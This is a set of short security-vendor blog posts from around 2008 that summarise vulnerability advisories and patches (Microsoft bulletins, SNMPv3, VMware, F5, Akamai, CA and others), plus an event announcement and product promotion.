Multiple vulnerabilities including buffer overflows, have been found in various vendors X Windows releases. These could lead to memory corruption and information leakage. The original advisories can be found at:http://labs.idefense.com/intelligence/vulnerabilities/
A vulnerability was identified in many implementations of SNMPv3 which allows an attacker to bypass SNMP authentication. In just a few days a working exploit was released into the wild. With the exploit remote attackers may be able to access and modify any SNMP on an affected system.This could affect many devices, and firmware will need to be updated across the board. The extent of affected systems is not completely known yet, but assume that all devices that implement SNMPv3 are vulnerable.
We are proud to announce our June Virtual Event topic for the month. Please join us as we cover a primer for social engineering assessments and how they can assist you in securing your organization. As always, our virtual events are long on information and short on sales and spin. They are also FREE!
Abstract:
This presentation will cover the reasons why your organization should consider a social engineering assessment as a part of their routine security auditing processes. Examples of test scenarios will be given, along with ideas on scoping such tests. Further, ways to appropriately use the results and tips on presenting the identiļ¬ed issues to upper management will be discussed.
Date: Tuesday, June 26th at 4pm Eastern
To register for the presentation and to receive the PDF of the slides as well as the dial in number, please send email to info@microsolved.com with “June Virtual Event” or the like in the subject line.
Editors note: Sorry for the need to create a subject clarification, but we are holding several events this month including live and virtual versions of our State of the Threat presentations. If you need more info about those presentations, just ask. Thanks!
MS08-030
Vulnerability in Bluetooth Stack Could Allow Remote Code Execution (951376)
Performing a large number of SDP requests could allow for code execution.
MS08-031
Cumulative Security Update for Internet Explorer (950759)
Vulnerabilities in MSIE allow code execution and cross domain information leaks.
Should be patched immediately as details on exploiting are publically available.
Rated:Critical
Replaces MS08-024.
MS08-032
Cumulative Security Update of ActiveX Kill Bits (950760)
A vulnerability in the Speech API could allows for remote execution in the context of the user viewing a specially crafted webpage. Speech recognition must be enabled.
Rated: Moderate
Replaces MS08-023.
MS08-033
Vulnerabilities in DirectX Could Allow Remote Code Execution (951698)
Input validation vulnerabilities may allow code execution via DirectX.
Rated: Critical
Replaces MS07-064.
MS08-034
Vulnerability in WINS Could Allow Elevation of Privilege (948745)
A privilege escalation vulnerability in WINS could allows an attacker to compromise a vulnerable system.
Rated: Important
Replaces MS04-045.
MS08-035
Vulnerability in Active Directory Could Allow Denial of Service (953235)
Input validation failure in the LDAP can lead to a Denial of Service.
Rated: Important
Replaces MS08-003.
MS08-036
Vulnerabilities in Pragmatic General Multicast (PGM) Could Allow Denial of Service (950762)
Input validation vulnerabilities in PGM packets can be leveraged to cause a Denial of Service.
Rated:Important
Replaces MS06-052.
Tomorrow Microsoft will be releasing updates for their monthly patch cycle. It looks like there will be 3 critical rated vulnerabilities. One of which is in the bluetooth service. This one is interesting as it’s listed as being remotely exploitable. Assuming that it’s exploitable over the bluetooth interface, this one could be very interesting. Watch for exploits for this vulnerabilities showing up in every attackers repitoire if it’s viable.
The F5 FirePass SSL VPN appliance is vulnerable to cross site scripting attacks within the management console. This device, designed to protect against XSS attacks, contains a XSS within the /vdesk/admincon/webyfiers.php and /vdesk/admincon/index.php pages that could permit an attacker to force premature termination of the parameter value and to inject an event handler script. This vulnerability has been confirmed in version 6.0.2, hotfix 3. Previous versions may be affected. There’s no fix for it at the moment, so users/admins should not browse to untrusted sites while logged in to the management interface.
We are detecting increasing PHP scans for a series of known PHP vulnerabilities that thus far are originating from Asia.
To date, we see no new attacks, just checks for known bad pages, particularly admin interfaces and a couple of quick URLs to test for command injections. The scans seem to have begun in the last 24 hours and the traffic appears to be related to a possible new PHP scanner. Likely, some new tool has been released that contains a plethora of PHP vulnerabilities.
Organizations should ensure that any systems offering PHP or PHP applications have been properly assessed and patched.
HoneyPoint Security Server users are urged to deploy a web HoneyPoint or HornetPoint and to drop the hosts performing the scans into your firewall or router black hole lists. This should allow you to create a “one strike and you’re out” approach for black holing attacking systems.
Please let us know if you see any new PHP activity. We are currently watching this pattern for any zero-day type activity, but thus far, we have observed only known security issues. being probed.
Sun’s Java Active Server Pages version 4.0.2 contains multiple vulnerabilities. These vulnerabilities are numerous and could result in a variety of negative consequences; including remote system compromise, bypassing security restrictions, and manipulation of data. Sun has released version 4.0.3 that corrects the issues in 4.0.2.
VMWare ESX server versions 2.x and 3.x are vulnerable to information disclosure, denial of service, and in some cases remote system compromise. All administrators and users of VMWare should consider applying the vendor provided patches to their software. Full details can be found at http://www.vmware.com/security/advisories/VMSA-2008-0009.html.
The Akamai download manager contains and input validation error in its’ ActiveX control. This could result in system compromise or a denial of service when a user visits a malicious web page. The vulnerability affects versions 2.2.3.5 and prior. A working exploit has already been released. Update to version 2.2.3.7, available at http://dlm.tools.akamai.com/tools/upgrade.html
It’s hard to believe, but the FBI has recently announced that Wi-Fi Hotspots might not be secure.
I read it here, so it must be true… š
In a way I am glad to see public notices like this. Maybe if the FBI draws attention to the problems, average people will pay attention to the solution. Of course, their mitigation suggestions include the “keep your computer patched, use firewall and encryption” routine.
The sad part is that you can do all of these things and still fall victim to a number of security issues such as dns poisoning, DHCP spoofing, social engineering and a myriad of other problems. I guess that is a perfect reason why we push so hard for average folks to use our HoneyPoint:Network Trust Agent product. At less than 10 bucks, it adds yet more capability and ease of use to protecting even non-technical users when they are on untrusted networks, including wi-fi.
Public networks are likely to remain unsafe for users who are not vigilant for a long time to come. Firewalls and patches can help keep them safe, but until they make better decisions about information security and can resist many of the basic attacks that leverage social engineering and the like, free wi-fi will likely be a cyber-wild west for a while longer.
If you want to hear more about protecting mobile users against public network threats, drop us a line. Until then, we will wait to hear from the FBI. Maybe they can help us get the word out that there is help available for wi-fi users.
A denial of service vulnerability has been reported in CA eTrust Content Manager. This vulnerability can also be exploited to compromise a vulnerable system. The vulnerability is caused due to boundary errors in certain FTP requests that could result in a stack based buffer overflow. The vulnerabilities are reported in CA eTrust Secure Content Manager 8.0.
CA has provided a patch for this issue.
Also, an unspecified vulnerability in IBM WebSphere Application Server has been reported. Very little details are available regarding this vulnerability. IBM has released fix pack 17 to address this issue (whatever it is).